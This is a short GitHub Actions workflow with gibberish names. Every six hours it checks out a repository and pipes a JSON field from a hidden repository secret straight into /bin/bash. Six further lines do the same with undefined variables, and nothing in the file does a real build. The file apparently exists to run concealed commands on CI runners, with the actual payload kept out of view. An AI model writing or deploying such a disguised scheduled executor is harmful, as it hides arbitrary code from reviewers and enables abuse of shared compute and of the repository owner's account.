name: yangzhengdao3645
on:
  workflow_dispatch:
  schedule:
    - cron: '57 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yangzhengdao3645
        env:
          v80: ${{ secrets.v80 }}
        run: |
          echo $v80 | jq -r .pz9006 | /bin/bash
          echo $ozh53287 | jq -r .uzugz02242 | /bin/bash
          echo $dgx66 | jq -r .ow63925 | /bin/bash
          echo $ge2 | jq -r .ckm77 | /bin/bash
          echo $zymo588 | jq -r .x9 | /bin/bash
          echo $fq41 | jq -r .l91 | /bin/bash
          echo $tnc371 | jq -r .cmr1 | /bin/bash

